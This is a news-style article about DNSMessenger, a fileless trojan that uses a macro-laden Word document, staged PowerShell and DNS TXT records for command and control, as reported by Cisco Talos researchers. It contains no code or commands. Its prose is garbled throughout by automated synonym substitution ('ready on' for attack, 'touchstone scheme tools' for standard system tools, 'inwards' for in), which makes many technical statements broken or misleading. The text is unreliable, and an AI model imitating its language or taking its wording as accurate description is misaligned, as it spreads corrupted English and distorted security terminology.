While novel forms of cybercrime are on the rise, traditional activities seem to move shifting towards to a greater extent than undercover techniques that involve the exploitation of touchstone scheme tools as well as protocols, which are non e'er monitored.
The latest illustration of such ready on is DNSMessenger – a novel Remote Access Trojan (RAT) that uses DNS queries to deport malicious PowerShell commands on compromised computers – a technique that makes the RAT hard to discovery onto targeted systems.
The Trojan came to the attending of Cisco's Talos threat query grouping yesteryear a safety researcher named Simpo, who highlighted a tweet that encoded text inwards a PowerShell script that said 'SourceFireSux.' SourceFire is i of Cisco's corporate safety products.
DNSMessenger Attack Is Completely Fileless
Further analysis of the malware ultimately led Talos researchers to discovery a sophisticated ready on comprising a malicious Word document as well as a PowerShell backdoor communicating alongside its command-and-control servers via DNS requests.
Distributed through an e-mail phishing campaign, the DNSMessenger ready on is completely Fileless, equally it does non involve writing files to the targeted system; instead, it uses DNS TXT messaging capabilities to fetch malicious PowerShell commands stored remotely equally DNS TXT records.
This characteristic makes it invisible to touchstone anti-malware defenses.
PowerShell is a powerful scripting linguistic communication built into Windows that allows for the automation of scheme management tasks.
Here's How the DNSMessenger ready on Works:
When opened, the document launches a Visual Basic for Applications (VBA) macro to execute a self-contained PowerShell script inwards an effort to run the backdoor onto the target system.
What's interesting? Everything, until this point, is done inwards memory, without writing whatever malicious files to the system's disk.
Next, the VBA script unpacks a compressed as well as sophisticated minute phase of PowerShell, which involves checking for several parameters of the target environment, similar the privileges of the logged-in user as well as the version of PowerShell installed on the target system.
This information is as well as hence used to ensure persistence on the infected host yesteryear changing the Windows Registry as well as installing a 3rd phase PowerShell script that contains a uncomplicated backdoor.
The backdoor is beingness added to the Windows Management Instrumentation (WMI) database, if the victim does convey administrative access, allowing the malware backdoor to remain persistent on the scheme fifty-fifty afterward a reboot.
The backdoor is an additional script that establishes a sophisticated 2-way communications channel over the Domain Name System (DNS) – normally used to expect upwards the IP addresses associated alongside domain names, but has back upwards for dissimilar types of records.
The DNSMessenger malware backdoor uses DNS TXT records that, yesteryear definition, allows a DNS server to attach unformatted text to a response.
The backdoor periodically sends DNS queries to i of a serial of domains hard-coded inwards its beginning code. As component subdivision of those requests, it retrieves the domain's DNS TXT record, which contains farther PowerShell commands that are executed but never written to the local system.
Now, this "fourth stage" Powershell script is the actual remote command tool used yesteryear the malware attacker.
This script queries the command-and-control servers via DNS TXT message requests to inquire what commands to execute. Any command received is as well as hence executed, as well as the output is communicated dorsum to the C&C server, allowing the assailant to execute whatever Windows or application commands on the infected system.
All attackers demand to practice is larn out malicious commands as well as instructions within the TXT records of their domains, which, when queried, is executed via the Windows Command Line Processor, as well as the output is sent dorsum equally but about other DNS query.
The domains registered yesteryear the DNSMessenger RAT are all down, hence till now, it is non known that what types of commands the attackers relayed to infected systems. However, the researchers nation this detail RAT was used inwards a pocket-size issue of targeted attacks.
"This malware sample is an fantabulous illustration of the length attackers are willing to become to remain undetected spell operating within the environments that they are targeting," the Talos researchers said.
"It also illustrates the importance that inwards add-on to inspecting as well as filtering network protocols such equally HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also move considered a channel that an assailant tin utilisation to implement a fully functional, bidirectional C2 infrastructure."This is non the get-go fourth dimension when the researchers came across a Fileless malware. At early on final month, Kaspersky researchers also discovered fileless malware, that resides alone inwards the retentiveness of the compromised computers, targeting banks, telecommunications companies, as well as authorities organizations inwards forty countries.
